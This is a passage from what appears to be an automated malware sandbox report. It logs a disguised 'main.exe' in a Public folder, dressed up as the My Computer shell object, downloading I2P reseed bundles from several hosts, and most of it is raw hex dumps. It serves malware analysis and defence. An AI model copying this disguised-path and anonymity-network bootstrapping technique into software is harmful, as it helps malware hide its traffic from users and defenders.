                                                                                                                                                Jan 5, 2025 17:49:41.570261002 CET1.1.1.1192.168.2.50xe213No error (0)reseed-pl.i2pd.xyz185.226.181.238A (IP address)IN (0x0001)false
                                                                                                                                                Jan 5, 2025 17:49:43.684139013 CET1.1.1.1192.168.2.50xe25fNo error (0)reseed.i2pgit.org68.183.196.133A (IP address)IN (0x0001)false
                                                                                                                                                Jan 5, 2025 17:51:00.291112900 CET1.1.1.1192.168.2.50x12ecNo error (0)reseed.onion.im159.223.194.171A (IP address)IN (0x0001)false

                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.54985695.216.2.1724436524C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-05 16:49:40 UTC102OUTGET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0
                                                                                                                                                User-Agent: Wget/1.11.4
                                                                                                                                                Connection: close
                                                                                                                                                2025-01-05 16:49:41 UTC247INData Raw: 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 69 32 70 73 65 65 64 73 2e 73 75 33 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 39 35 39 35 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 6c 69 6d 69 74 3a 20 34 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 6d 61 69 6e 69 6e 67 3a 20 33 0d 0a 78 2d 72 61 74 65 6c 69 6d 69 74 2d 72 65 73 65 74 3a 20 39 30 30 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 30 35 20 4a 61 6e 20 32 30 32 35 20 31 36 3a 34 39 3a 34 30 20 47 4d 54 0d 0a 0d 0a
                                                                                                                                                Data Ascii: HTTP/1.0 200 OKcontent-disposition: attachment; filename=i2pseeds.su3content-length: 69595content-type: application/octet-streamx-ratelimit-limit: 4x-ratelimit-remaining: 3x-ratelimit-reset: 900date: Sun, 05 Jan 2025 16:49:40 GMT
                                                                                                                                                2025-01-05 16:49:41 UTC14998INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 10 00 00 00 00 00 01 0d 93 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 35 36 39 36 36 30 34 00 00 00 00 00 00 68 6f 74 74 75 6e 61 40 6d 61 69 6c 2e 69 32 70 50 4b 03 04 14 00 08 00 08 00 2b 15 98 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4c 74 74 30 4c 63 45 66 49 6d 64 54 5a 67 58 2d 64 30 6b 51 73 69 33 56 43 48 38 59 42 78 6c 58 59 51 5a 52 6e 7a 51 46 62 32 38 3d 2e 64 61 74 55 54 05 00 01 52 1f 6a 67 8a e1 f3 b9 c4 37 d5 63 f5 95 a3 ae ec 1d 2a cb d6 33 33 9c 4b 33 33 16 de be f7 c9 ce 95 c1 6f 2a b9 b7 a9 a8 4c 29 16 fc 7e ef eb 89 b2 4b 51 c6 35 ea eb d7 c9 bc 68 5a f0 41 7e dd 9e 83 77 ae de 39 f8 7d 54 1e bf fc 67 dd 0f b9 2b 6e b7 ef bf 14 6e e7
                                                                                                                                                Data Ascii: I2Psu31735696604hottuna@mail.i2pPK+Y;routerInfo-Ltt0LcEfImdTZgX-d0kQsi3VCH8YBxlXYQZRnzQFb28=.datUTRjg7c*33K33o*L)~KQ5hZA~w9}Tg+nn
                                                                                                                                                2025-01-05 16:49:41 UTC1072INData Raw: 4e b3 ca be 6a b5 ff ab fd 59 49 fb a1 88 93 f2 54 6b 4e ef 6e 2f 97 75 55 a1 ac 0c 2c 0c ec 0c 2c 0c 0c 8c 93 7f dc b7 ea 62 62 65 80 02 96 e0 e0 50 23 86 79 2c c9 89 05 c5 b6 4c 4e ce d6 2c 19 f9 c5 25 b6 3c 16 66 7a 86 e6 7a 46 86 46 7a 66 e6 d6 8c 99 b6 3a 1e 39 5e 95 c1 f9 a1 be a5 5e f9 89 51 1e 11 2e be 75 79 25 26 61 05 41 1e 7e 49 06 ba 39 de ee 01 81 15 11 86 a6 41 96 ee 9e 26 b6 d6 cc b9 25 a5 b6 2c 86 46 16 06 d6 2c 05 f9 45 25 b6 ac 86 16 46 a6 a6 d6 8c c5 b6 3a 26 c6 c9 06 f9 fe ee 4e ae 91 49 96 c9 69 65 26 16 ae ae c1 91 c9 a6 85 49 e9 3e c5 86 ae a9 25 89 61 65 a5 c9 ae 21 ee 45 4e 91 b6 d6 8c 65 b6 8c 46 d6 5c 30 d7 b2 fa 85 38 07 18 31 94 e2 70 a4 44 90 45 72 a8 9f 81 67 84 7b 48 52 8a 5b 44 b1 99 59 b6 7f 5e 81 a3 ad 2d a6 2b cc aa 2a
                                                                                                                                                Data Ascii: NjYITkNn/uU,,bbeP#y,LN,%<fzzFFzf:9^^Q.uy%&aA~I9A&%,F,E%F:&NIie&I>%ae!ENeF\081pDErg{HR[DY^-+*
                                                                                                                                                2025-01-05 16:49:41 UTC15248INData Raw: 4f 74 75 61 53 79 58 61 5a 34 57 4d 7a 30 4f 6e 74 42 65 72 72 30 66 6d 5a 65 57 62 62 49 3d 2e 64 61 74 55 54 05 00 01 60 4a 6a 67 ec d3 4d 88 dc e4 1f 07 f0 cc 7f 67 ff c5 1e 2c 15 f5 24 08 6b d5 83 33 cb f3 24 4f 9e 4c 18 63 9d c9 26 33 c9 ec cc 64 5e 32 dd c9 65 99 4c 32 49 76 de 32 c9 4c 26 13 6a 8b 1e b4 50 4a 15 0f 45 8b 3d 28 52 3c b5 f8 76 a8 97 5a 2a a5 e0 4d ba 15 c1 82 50 10 14 57 f1 a4 e2 41 f6 65 5c 28 d4 43 bd 9a e3 f7 c7 ef 47 be 7c 78 4e b1 85 a7 db fe f1 6b 17 6f 3e 79 4e b9 5d 5a 97 a4 2b 11 7f 84 7e fd ce dd c3 3f de 38 fa d9 ba fb c8 97 2f 7d 35 f5 3e be 7c fe f4 e5 6b f1 17 ae 8f ea 4f 5d 5c fa e6 c0 1f 9f fc 92 bb 90 0f be 3d fc df fc 9f e7 9c ff f5 99 1f da 37 cf 3e cb 1f bd b1 5e da fa e2 34 1f de 3a 7b e6 d3 e7 27 ef 4f 27 6f bd
                                                                                                                                                Data Ascii: OtuaSyXaZ4WMz0OntBerr0fmZeWbbI=.datUT`JjgMg,$k3$OLc&3d^2eL2Iv2L&jPJE=(R<vZ*MPWAe\(CG|xNko>yN]Z+~?8/}5>|kO]\=7>^4:{'O'o
                                                                                                                                                2025-01-05 16:49:41 UTC16320INData Raw: 6d 75 47 6b 51 3d 2e 64 61 74 55 54 05 00 01 a8 5c 6a 67 6a da f5 e9 6d 45 c9 cb 7d 62 d5 46 d6 e7 cf 05 1e 38 74 8c 65 63 eb f6 96 e9 3b ab 43 3a 15 ce f2 27 ee 90 09 ab 75 3a bc 22 a2 6c aa fd 01 6e c5 9e 7d c7 12 9f 2f cb 90 30 7d d9 cb 91 70 42 a3 e8 9d fe a8 3c 7e f9 15 27 2f 0a dc 79 18 ff c3 ae 6a 61 f5 4c 6d c3 a6 80 a7 52 27 b9 bf 3a 09 2e 67 15 da 70 4a ef df 14 56 06 16 06 76 06 16 06 06 c6 c9 3f 7e 96 b4 b3 f0 31 40 01 ab 5f 88 73 80 11 83 03 4b 72 62 41 b1 2d a3 89 35 63 b1 ad 8e 71 69 9e 9b 65 44 50 a8 97 77 4a 40 56 50 99 8f 65 58 a5 5f 5d 90 69 89 87 51 68 76 59 a0 a1 8b 53 45 65 a1 59 a2 53 45 99 71 b9 ad 35 63 99 2d a3 91 35 33 0e 03 cd c8 35 90 1f 66 20 4b 70 70 a8 11 63 0d c2 81 99 b6 3a 41 d9 c9 85 ba 25 29 ba a1 29 de ce 26 99 2e 2e
                                                                                                                                                Data Ascii: muGkQ=.datUT\jgjmE}bF8tec;C:'u:"ln}/0}pB<~'/yjaLmR':.gpJVv?~1@_sKrbA-5cqieDPwJ@VPeX_]iQhvYSEeYSEq5c-535f Kppc:A%))&..
                                                                                                                                                2025-01-05 16:49:41 UTC16320INData Raw: 01 98 2d 6a 67 ca 97 b0 39 5b b8 a4 67 d5 6c 8b 4d 56 4b 34 d9 7a ab 8b 8e 9c fc 5e f3 6b 22 db e7 97 4b 9d 45 f8 18 02 63 38 0b d6 f6 0b 48 ee f9 9d f6 4e 69 fb 6b a1 6f 7a 2b f7 e5 26 d8 5f fd 13 65 e8 e6 d5 50 73 62 54 1e bf 7c d6 32 0e 8d 1d e7 6a 83 44 e6 3e 28 73 95 3f 28 f8 22 f2 48 c9 b1 d7 5e ee a7 62 0d 7c 7e 5d ad 9e c3 ca c0 c2 c0 ce c0 c2 c0 c0 38 f9 c7 1f 2e 69 26 56 06 28 60 09 0e 0e 35 62 98 ca 92 9c 58 50 6c cb e8 64 cd 92 91 5f 5c 62 cb 6f 64 68 ac 67 68 60 a9 67 68 66 a4 67 68 69 6e cd 98 69 ab 53 e8 15 1e 15 e0 9f 69 6c 9c 13 e0 92 9b 15 10 61 1a 12 58 e1 1f 54 e2 e6 9b e2 16 14 94 14 1e 1e 1e 58 17 94 e1 e9 96 9b 61 16 6a 6b cd 52 90 5f 54 62 cb 6a 6c 64 6e 66 69 cd 58 6c ab 93 68 e1 96 63 59 9a e4 5e 61 1a 68 98 68 69 ea e8 e8 99 e6
                                                                                                                                                Data Ascii: -jg9[glMVK4z^k"KEc8HNikoz+&_ePsbT|2jD>(s?("H^b|~]8.i&V(`5bXPld_\bodhgh`ghfghiniSilaXTXajkR_TbjldnfiXlhcY^ahhi
                                                                                                                                                2025-01-05 16:49:41 UTC5637INData Raw: 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 58 63 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 78 68 5a 66 63 4b 30 33 6a 70 61 72 6d 50 67 4a 44 59 4e 32 68 38 37 52 7a 7e 69 62 4f 46 37 35 55 58 38 56 4c 48 6c 76 79 62 34 3d 2e 64 61 74 55 54 05 00 01 86 60 6a 67 50 4b 01 02 14 00 14 00 08 08 08 00 e8 16 98 59 a3 8f 1e 78 86 02 00 00 db 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 a8 65 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 2d 5a 54 33 7e 48 74 68 46 37 69 4a 50 30 62 55 69 4d 47 4c 39 32 57 7e 30 4a 2d 69 79 56 74 72 78 6c 4a 66 56 70 67 2d 50 2d 51 3d 2e 64 61 74 55 54 05 00 01 94 22 6a 67 50 4b 01 02 14 00 14 00 08 00 08 00 22 2e 98 59 3d 32 da 5d e2 01 00 00 2d 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 a0 68 00 00 72 6f 75 74 65 72 49 6e
                                                                                                                                                Data Ascii: ;XcrouterInfo-xhZfcK03jparmPgJDYN2h87Rz~ibOF75UX8VLHlvyb4=.datUT`jgPKYx;erouterInfo--ZT3~HthF7iJP0bUiMGL92W~0J-iyVtrxlJfVpg-P-Q=.datUT"jgPK".Y=2]-;hrouterIn


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.549867185.226.181.2384436524C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-05 16:49:42 UTC104OUTGET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0
                                                                                                                                                User-Agent: Wget/1.11.4
                                                                                                                                                Connection: close
                                                                                                                                                2025-01-05 16:49:42 UTC160INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Sun, 05 Jan 2025 16:49:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.549876185.226.181.2384436524C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-05 16:49:43 UTC104OUTGET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0
                                                                                                                                                User-Agent: Wget/1.11.4
                                                                                                                                                Connection: close
                                                                                                                                                2025-01-05 16:49:43 UTC160INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Sun, 05 Jan 2025 16:49:43 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.54988568.183.196.1334436524C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-05 16:49:44 UTC103OUTGET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0
                                                                                                                                                User-Agent: Wget/1.11.4
                                                                                                                                                Connection: close
                                                                                                                                                2025-01-05 16:49:44 UTC288INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Sun, 05 Jan 2025 16:49:44 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 64742
                                                                                                                                                Connection: close
                                                                                                                                                Content-Disposition: attachment; filename=i2pseeds.su3
                                                                                                                                                X-Ratelimit-Limit: 4
                                                                                                                                                X-Ratelimit-Remaining: 3
                                                                                                                                                X-Ratelimit-Reset: 900
                                                                                                                                                2025-01-05 16:49:44 UTC3830INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 17 00 00 00 00 00 00 fa 97 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 36 30 38 34 37 32 36 00 00 00 00 00 00 68 61 6e 6b 68 69 6c 6c 31 39 35 38 30 40 67 6d 61 69 6c 2e 63 6f 6d 50 4b 03 04 14 00 08 00 08 00 a1 5c 25 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 65 56 4a 4e 2d 67 65 71 36 74 71 52 79 42 33 61 61 6d 37 62 30 72 32 71 46 37 4c 59 63 5a 63 30 4c 79 4c 67 62 4c 30 6b 5a 79 34 3d 2e 64 61 74 55 54 05 00 01 df 6e 7a 67 d2 35 9d e1 36 77 fd 2e e1 86 1e 8d 83 55 53 fa 59 35 26 5e ff 2c f6 98 7f cd ee 7c d3 6f ff 2b 56 e5 f7 47 1a 2c dd 7b 2b db f6 a0 5d d4 94 b3 5a 6f fe 97 f5 6f e3 2c b8 fc e8 7b cc 4e 7f 36 cb 8d 0e 07 6b 13 17 72 da 99 18 1c cd 64
                                                                                                                                                Data Ascii: I2Psu31736084726hankhill19580@gmail.comPK\%Z;routerInfo-eVJN-geq6tqRyB3aam7b0r2qF7LYcZc0LyLgbL0kZy4=.datUTnzg56w.USY5&^,|o+VG,{+]Zoo,{N6krd
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: d3 9b 2f 3a bc 3a f6 4f 66 0b d7 7e 53 7b d4 ca 23 56 72 62 43 f4 6c 71 8e a0 c8 8f 4a ba 3f ae 9e 9a f2 50 5d 9c 2f da e0 41 e6 cb 99 0c 81 45 62 eb 4f 2c ed 67 65 60 61 60 67 60 61 60 60 9c 62 36 b7 4f 8e 89 99 01 0a 58 fd 42 9c 03 8c 18 ca 58 32 f2 8b 4b 6c 79 0d cd 2d f4 0c cd 4d f5 0c 8d 4d f4 8c ad 19 33 6d 25 b2 0b 8c 7c 4c 22 0b c2 8d cb 8c 74 2b 2a 9d d3 d2 9c b2 0a 2d d3 6d 6d ad 59 0a f2 8b 4a 6c 59 8d 2c 2d 4d 8c ad 19 8b 6d 75 d2 4b bc 72 9c 2b b2 cd 43 1c 2d 32 3d dd 82 7c 4d ea bc 92 f3 8d 2a 8a aa 72 cb 82 fd fd 0a 02 f2 fd 1c 4b fc 82 9c 8a 8b 42 4c 6c ad 19 cb 6c 19 8d ac 39 60 ce 60 09 0e 0e 35 62 98 c2 92 9c 58 50 6c cb e4 e4 6c 8d cb 3d 3a 69 89 55 69 55 25 16 9e 7e a1 f9 c9 fe 26 91 c9 a5 59 5e 81 26 01 25 e6 91 fe a1 ce f9 6e 66 c1
                                                                                                                                                Data Ascii: /::Of~S{#VrbClqJ?P]/AEbO,ge`a`g`a``b6OXBX2Kly-MM3m%|L"t+*-mmYJlY,-MmuKr+C-2=|M*rKBLll9``5bXPll=:iUiU%~&Y^&%nf
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: af b2 06 99 1c d6 66 11 99 a9 f9 fc b2 74 98 8c 9e 59 cf 04 95 5f 31 9c 2c 2b c2 58 19 58 18 d8 19 58 18 18 18 a7 98 2d 73 ac 63 62 65 80 02 96 e0 e0 50 23 86 79 2c c9 89 05 c5 b6 8c 4e d6 2c 19 f9 c5 25 b6 bc 16 a6 7a a6 16 7a 86 a6 86 7a 46 46 86 d6 8c 99 b6 3a 91 ee a9 ce 3e 16 49 46 19 ce 51 89 5e ee ba f9 59 21 be a9 a9 61 16 f9 9e 1e 46 05 85 a1 86 66 96 81 65 85 25 65 a5 6e 96 06 26 b6 d6 cc b9 25 a5 b6 2c 86 46 16 06 d6 2c 05 f9 45 25 b6 ac 46 e6 06 96 a6 d6 8c c5 b6 3a 89 51 ee 55 26 16 a9 e1 06 21 66 7e 2e be 89 89 ce 69 06 e5 c9 be e9 6e 25 95 c6 fe e1 c5 39 39 2e e1 ee be 7e 49 16 e6 d9 06 f9 b6 d6 8c 65 b6 8c 46 d6 dc 30 d7 b2 fa 85 38 07 18 31 94 e1 72 a5 44 a9 b9 ae 7b 76 a8 67 91 77 be 85 a5 a9 63 59 b1 61 94 4f 6e 79 ba ad 2d a6 33 22 33
                                                                                                                                                Data Ascii: ftY_1,+XXX-scbeP#y,N,%zzzFF:>IFQ^Y!aFfe%en&%,F,E%F:QU&!f~.in%99.~IeF081rD{vgwcYaOny-3"3
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: 00 ff ff 50 4b 07 08 a1 8a 22 b4 dd 01 00 00 25 03 00 00 50 4b 03 04 14 00 08 08 08 00 a5 66 25 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6d 6a 75 61 41 4b 7e 47 67 71 31 35 32 50 63 4d 4d 59 59 45 64 69 4a 37 4b 35 47 72 38 36 58 68 48 6a 4c 4a 73 36 45 36 72 6d 41 3d 2e 64 61 74 55 54 05 00 01 b7 80 7a 67 4a cd 7d f0 70 c5 9c 00 ff 62 3f ef 23 2d ab 78 de ef 54 95 93 7e aa 21 cd 62 3a 73 c2 b1 e3 67 f6 d4 17 39 57 e5 a6 d7 47 2f 92 53 d9 97 cf 5a ea aa b7 63 56 82 42 7c bc f7 12 25 93 df d6 93 97 31 6d 1d 95 c7 2f 6f 31 3b d9 75 99 21 4b 7d 2b fb d9 bf ea a1 d2 52 93 65 3d 9c 2b 57 37 7f 8c 89 78 aa 3d ff af 6a 12 2b 03 0b 03 3b 03 0b 03 03 e3 14 b3 b6 33 ec 4c cc 0c 50 c0 ea 17 e2 1c 60 c4 50 ce 92 91 5f 5c 62
                                                                                                                                                Data Ascii: PK"%PKf%Z;routerInfo-mjuaAK~Ggq152PcMMYYEdiJ7K5Gr86XhHjLJs6E6rmA=.datUTzgJ}pb?#-xT~!b:sg9WG/SZcVB|%1m/o1;u!K}+Re=+W7x=j+;3LP`P_\b
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: ff ff 50 4b 07 08 86 7c 3e f7 25 02 00 00 90 04 00 00 50 4b 03 04 14 00 08 08 08 00 14 57 25 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 32 61 6d 54 77 51 66 4f 4e 70 62 75 42 51 76 54 34 31 66 39 5a 6a 70 73 35 4e 7e 59 6d 4f 64 69 41 31 70 34 64 6d 31 76 6c 46 63 3d 2e 64 61 74 55 54 05 00 01 68 65 7a 67 f2 68 97 fa fe 27 f3 4c 25 63 cf 3a 46 f3 03 33 de a7 1e 8a 9b 3f 7b df c6 90 ff be cf 19 a7 69 66 57 f2 5a 47 dc ae 51 ce f4 bf 2b 72 74 9a eb a5 a8 0c 89 d8 ed 6b 0d 6a 03 6e 1a 9c fb 2a b3 63 de c9 1d a3 f2 f8 e5 2f 2c 3a 67 b8 73 ea 83 29 b6 ee 0f 6f df 6d bf 9a 7c a5 c1 fa 96 cb ce cc 0c 35 96 a5 53 16 5c 77 53 66 65 60 61 60 67 60 61 60 60 9c 62 26 23 7f 9f 89 9b 01 0a 58 fd 42 9c 03 8c 18 4a 59 32 f2 8b 4b
                                                                                                                                                Data Ascii: PK|>%PKW%Z;routerInfo-2amTwQfONpbuBQvT41f9Zjps5N~YmOdiA1p4dm1vlFc=.datUThezgh'L%c:F3?{ifWZGQ+rtkjn*c/,:gs)om|5S\wSfe`a`g`a``b&#XBJY2K
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: c0 12 1c 1c 6a c4 30 99 25 39 b1 a0 d8 96 d1 c9 9a 25 23 bf b8 c4 96 d7 c2 5c cf c8 c0 52 cf c2 5c cf d0 dc c2 9a 31 d3 56 c7 3b df c8 a8 ac a2 b0 d2 c0 d1 b1 a4 c4 b4 3c 33 23 d9 c9 cc c9 d8 db b8 c0 23 33 df 20 ad ca 25 20 d1 db 30 b5 20 22 c2 dc 3c d9 d6 9a a5 20 bf a8 c4 96 d5 c8 d8 d0 d4 c4 9a b1 d8 56 27 cd 2b 52 d7 35 b3 2c 2a a9 20 bd c4 38 22 d3 a9 cc d5 2b cd af 30 cd a8 2c 34 3f d9 c0 dc dd a7 c8 af d8 cb c4 34 b8 a2 d4 b1 d8 d6 9a b1 cc 96 d1 c8 9a 1b e6 44 56 bf 10 e7 00 23 86 32 5c 4e 93 c8 73 31 76 b1 cc 2a 35 f7 37 ac 70 f1 f2 4a 74 4b 29 37 74 4b 2e b7 c5 e2 8c f2 70 73 e7 8a e0 b2 00 c7 b0 22 8f 5c c7 1c ef b2 a0 ec e0 e2 dc a0 c2 64 17 1f 4b 33 17 23 b7 dc dc b2 54 d7 62 93 cc 74 a3 74 98 33 18 18 74 20 81 c3 e4 17 64 cd 9a 97 5a e2 99
                                                                                                                                                Data Ascii: j0%9%#\R\1V;<3##3 % 0 "< V'+R5,* 8"+0,4?4DV#2\Ns1v*57pJtK)7tK.ps"\dK3#Tbtt3t dZ
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: d4 44 cf d0 d4 4c cf d0 dc c4 9a 31 d3 56 c2 39 22 3b 24 a4 20 d3 20 cc bb 34 cc 38 24 3f 2d b7 aa c4 b8 28 d0 d6 d6 9a a5 20 bf a8 c4 96 c5 d0 d2 c4 d0 9a b1 d8 56 c7 dc 3c 28 37 33 df c2 38 d1 b0 38 d4 cf 28 38 bf 2a d0 c9 2f b9 ce a4 c8 dd 3b aa c4 a4 28 ac 28 5d 37 31 23 b1 d2 bc d4 d3 a3 dc d6 9a b1 cc 96 d1 c8 9a 03 e6 0c 96 e0 e0 50 23 86 29 2c c9 89 05 c5 b6 4c 4e ce d6 38 dd a3 53 1c 1e 59 e2 95 66 91 55 92 ed a6 6b 98 e8 93 e3 93 a6 eb e9 e9 e2 5e 1a 52 e2 e3 67 91 55 ec 92 9b ea e6 e8 1a 10 6a e6 e7 55 8c e9 46 33 67 cf a2 ac c8 52 73 0b 27 d7 0c 8f 30 e3 c0 f0 2c 8b 08 ff 12 a3 94 a0 d4 b4 3a 13 33 f3 3a e3 44 df 24 53 bf 32 8f aa 72 03 98 1b 19 18 52 20 ce 62 89 48 0b 72 b1 66 cd 4b 2d f1 4c 01 49 88 e4 a5 96 a4 24 e9 65 e7 e5 97 e7 f9 a4 26
                                                                                                                                                Data Ascii: DL1V9";$ 48$?-( V<(7388(8*/;((]71#P#),LN8SYfUk^RgUjUF3gRs'0,:3:D$S2rR bHrfK-LI$e&
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: cc b4 95 a8 74 49 2c cb 2c 2d f4 71 4d f7 4d 0a 36 4e af 0c 0a 4c 8e aa 4a b7 b5 b5 66 29 c8 2f 2a b1 65 35 32 b2 b0 30 b3 66 2c b6 d5 71 f1 cc 4b ad 48 09 f7 4f 0d cd a9 f0 4f 4c 36 29 f4 f3 32 8d 2c f0 72 f2 f4 70 aa 30 f7 75 2d cd 35 8c d2 cd 36 c8 a9 cb 0b f2 b5 b5 66 2c b3 65 34 b2 66 85 b9 83 25 38 38 d4 88 61 0a 4b 72 62 41 b1 2d a3 93 35 4e f7 e8 78 7a e6 15 1a 87 b8 47 a4 7a 25 06 7a 14 14 57 e4 9a a5 79 45 fa b9 a5 5a 84 97 a6 39 59 f8 d6 25 06 9a bb a4 65 85 ba 65 98 97 63 71 a3 41 91 63 9d ab 6e 78 84 63 6a 50 89 73 5a 79 94 99 53 b0 57 78 4a 70 78 66 7e 68 55 a2 ab 7b 90 b7 73 7e 70 7a 6a 5e 51 b1 7b 3a cc 8d 0c 0c 3a 10 67 31 05 04 59 b3 e6 a5 96 78 a6 80 84 f9 8a f2 4b 4b 52 8b f4 ca 52 8b 8a 33 f3 f3 6c d9 0c f4 2c f5 cc 4c ac 3f 55 ab 4c
                                                                                                                                                Data Ascii: tI,,-qMM6NLJf)/*e520f,qKHOOL6)2,rp0u-56f,e4f%88aKrbA-5NxzGz%zWyEZ9Y%eecqAcnxcjPsZySWxJpxf~hU{s~pzj^Q{::g1YxKKRR3l,L?UL
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4d 77 77 39 77 47 35 67 61 79 6e 6c 31 71 50 67 34 45 61 79 39 55 4d 31 45 77 33 75 46 68 66 45 4e 31 48 39 6f 67 71 49 5a 33 45 3d 2e 64 61 74 55 54 05 00 01 d3 6a 7a 67 9a 28 aa be 7d cd 82 b0 c3 16 fe 6e 49 ca a1 27 1f bb 38 05 1d 9c b7 71 ba 43 4e 8c c4 05 86 2d 79 3c 22 fc 57 4a ca 73 66 ed 7a 5a c2 d2 fa b6 6d 0f 97 e1 ca 8a e6 39 b1 c6 65 bb ee 9c b1 d6 d7 9b b3 7d 54 1e bf fc 5e fd c3 13 e6 97 36 b9 1f f4 3a 98 bd 63 66 a4 f1 33 d1 1b 6a a1 bc 2b df be bc e2 3e 3b 52 b9 33 9c 95 81 85 81 9d 81 85 81 81 71 8a 99 a1 8f 1c 13 33 03 14 b0 fa 85 38 07 18 31 94 b1 64 e4 17 97 d8 f2 19 1a 19 e8 19 99 e8 19 99 1a eb 19 9a 18 58 33 66 da 4a a4 59 86 96 99 a7 a7 17 7b 17 f8 24 25 67 fb a6 5a 54 a4 15 bb 06 da da 5a b3 14
                                                                                                                                                Data Ascii: routerInfo-Mww9wG5gaynl1qPg4Eay9UM1Ew3uFhfEN1H9ogqIZ3E=.datUTjzg(}nI'8qCN-y<"WJsfzZm9e}T^6:cf3j+>;R3q381dX3fJY{$%gZTZ
                                                                                                                                                2025-01-05 16:49:44 UTC4096INData Raw: 45 68 50 5a a5 b1 5b b0 a1 51 62 59 ae 01 0e d7 6e 43 77 2d d1 81 3a a0 be 60 60 48 86 38 9c 39 22 2d c8 9a 35 2f b5 c4 33 05 24 2e 92 97 5a 92 92 a4 97 9d 97 5f 9e e7 93 9a 58 9c 1a 9c 5a 52 6c cb 6c 6a 6a 6c 2d 84 24 15 94 5f 5a 92 5a 54 6c cb 6a 68 66 6a 68 6a cd 57 04 e6 eb 95 a5 16 15 67 e6 e7 d9 b2 19 e8 59 ea 99 19 5b 8b 18 1d de 73 3d 2f 6d 77 bc c9 87 d4 b7 2f 66 cf 5b e1 22 b3 d0 72 e9 9c 1c fe f3 ea 85 07 cb 4b 9e 9d 95 74 3d cb 16 b4 7d e6 69 f1 07 21 3b 14 77 ef be f4 46 2b 73 c7 e4 0e 66 d3 8c e8 be bb 3c 5f 19 00 01 00 00 ff ff 50 4b 07 08 2d 2c 23 27 51 02 00 00 ce 04 00 00 50 4b 03 04 14 00 08 00 08 00 76 64 25 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 44 58 67 63 4d 2d 4c 36 52 59 70 51 36 71 32
                                                                                                                                                Data Ascii: EhPZ[QbYnCw-:``H89"-5/3$.Z_XZRlljjl-$_ZZTljhfjhjWgY[s=/mw/f["rKt=}i!;wF+sf<_PK-,#'QPKvd%Z;routerInfo-DXgcM-L6RYpQ6q2


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

